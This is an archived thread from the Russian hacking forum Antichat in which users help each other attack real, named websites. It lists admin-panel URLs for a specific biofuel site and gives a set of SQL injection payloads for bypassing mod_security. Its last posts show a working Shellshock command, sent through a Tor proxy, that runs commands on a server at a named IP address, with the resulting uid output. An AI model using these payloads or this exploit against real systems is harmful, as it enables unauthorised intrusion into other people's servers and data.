ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

14.02.2017, 17:45
|
|
Guest
Сообщений: n/a
Провел на форуме: 11851
Репутация:
30
|
|
Сообщение от DezMond™
DezMond™ said:
↑
Код:
Code:
http://www.biofuelstp.eu/
Помогите админку найти!
Код:
Code:
http://www.biofuelstp.eu/mapping/login.php
http://biofuelstp.eu/sqladmin
http://www.biofuelstp.eu/algaetaskforce/atf_home.html
|
|
|
|

14.02.2017, 20:35
|
|
Guest
Сообщений: n/a
Провел на форуме: 3550
Репутация:
0
|
|
|
|
|
|

15.02.2017, 09:54
|
|
Guest
Сообщений: n/a
Провел на форуме: 51198
Репутация:
3
|
|
Стандартная ошибка :
.SpoilerTarget" type="button">Spoiler
Not Acceptable
An appropriate representation of the requested resource .......... could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 PHP/5.2.17 mod_perl/2.0.6 Perl/v5.10.1 Server at www.............. Port 80
mod_security by pass .
|
|
|
|

15.02.2017, 10:15
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 89
Провел на форуме: 1668307
Репутация:
114
|
|
Сообщение от SaNDER
SaNDER said:
↑
Стандартная ошибка :
mod_security by pass .
попробуй что-то из следующего:
https://rdot.org/forum/showthread.php?t=3481
либо
Код:
Code:
id=1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--
id=1+uni%0bon+se%0blect+1,2,3--
id=1+UNunionION+SEselectLECT+1,2,3--
id=1+UnIoN/**/SeLecT/**/1,2,3--
id=1+un/**/ion+se/**/lect+1,2,3--
id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
?/%2A%2A/union/%2A%2A/select
1/*!UnIoN*/SeLecT+1,2,3--
id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables
/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
|
|
|

15.02.2017, 11:18
|
|
Guest
Сообщений: n/a
Провел на форуме: 51198
Репутация:
3
|
|
Сообщение от [aywo
"]
[aywo] said:
↑
попробуй что-то из следующего:
https://rdot.org/forum/showthread.php?t=3481
либо
Код:
Code:
id=1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--
id=1+uni%0bon+se%0blect+1,2,3--
id=1+UNunionION+SEselectLECT+1,2,3--
id=1+UnIoN/**/SeLecT/**/1,2,3--
id=1+un/**/ion+se/**/lect+1,2,3--
id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
?/%2A%2A/union/%2A%2A/select
1/*!UnIoN*/SeLecT+1,2,3--
id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables
/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
С обходом пробовал всё это . Токо как бы запросы не составлял постоянно типичная ошибка : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
|
|
|
|

15.02.2017, 11:19
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
Сообщение от qqq1457
qqq1457 said:
↑
отправляю сюда 79.171.115.8:8080//cgi-bin/wlogin методом get в Referer такое: () { Referer; }; echo -e "Content-Type: text/plain\n"; pwd
выполняется код,получаем Bash code injection vulnerability.вопрос: почему не выполняются команды: id,ls,uname ? и т д но
выполняются pwd и help?
акунетикс сильно логи засоряет, советую отказаться от активного пользования этим интсрументом вживую, и еще перехвати запросы акунетикса и посмотри что он отправляет на самом деле
|
|
|

15.02.2017, 12:16
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
Сообщение от qqq1457
qqq1457 said:
↑
а чем лучше отправлять post,get? да но на другом серве все норм исполняется
в лисе много плагинов которые прекрасно справляются с этими задачами, hackbar к примеру
|
|
|

15.02.2017, 12:23
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
Сообщение от qqq1457
qqq1457 said:
↑
я про отдельную прогу,ну да ладно,спасибо
проги обычно порождают паразитные запросы как и акунетикс
|
|
|

15.02.2017, 14:57
|
|
Guest
Сообщений: n/a
Провел на форуме: 300820
Репутация:
90
|
|
Сообщение от [aywo
"]
[aywo] said:
↑
Потому, что данные команды недоступны для web-сервера из-под юзера, под которым работает web-сервер
доступны, просто есть нюанс
|
|
|
|

15.02.2017, 15:39
|
|
Guest
Сообщений: n/a
Провел на форуме: 300820
Репутация:
90
|
|
Сообщение от [aywo
"]
[aywo] said:
↑
я, если честно, в диком ахуе, во что превратился ачат. Раньше тут не было столько школьников... хотя нынешних троллей даже школьниками не назвать. Помню Белого Жорика банили, за то, что гопника Kez'а троллил, как только мог. Но никто не поспорит,, что Жорик был профи в XSS. Даже большенство современной гринки ему в подметки не сгодятся, он развлекался хеком, и действительно делал это с юмором. Красный дядька+++ думал, что он ферзь йптваюматьнахявсеяинтерне т, ну или пытался таким казаться. А вот Elect, Algol, ettee - реально крутые мужики.
А что здесь происходит сейчас? Script kiddie - это тру хакеры в современном мире
ты написал самый вероятный случай, а я открыл консоль и разобрался, можно конечно злится и писать что вчера трава была зеленее, но выглядит это дешево
и тролей тут без меня хватает
Код:
Code:
~$ curl --proxy socks5://127.0.0.1:9150 '79.171.115.8:8080/cgi-bin/wlogin' -H 'Referer: () { Referer; }; echo -e "Content-Type: text/plain\n";echo $(/bin/id)'
uid=1777(meteo) gid=1778(meteo) groups=501(fdp),1778(meteo)
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|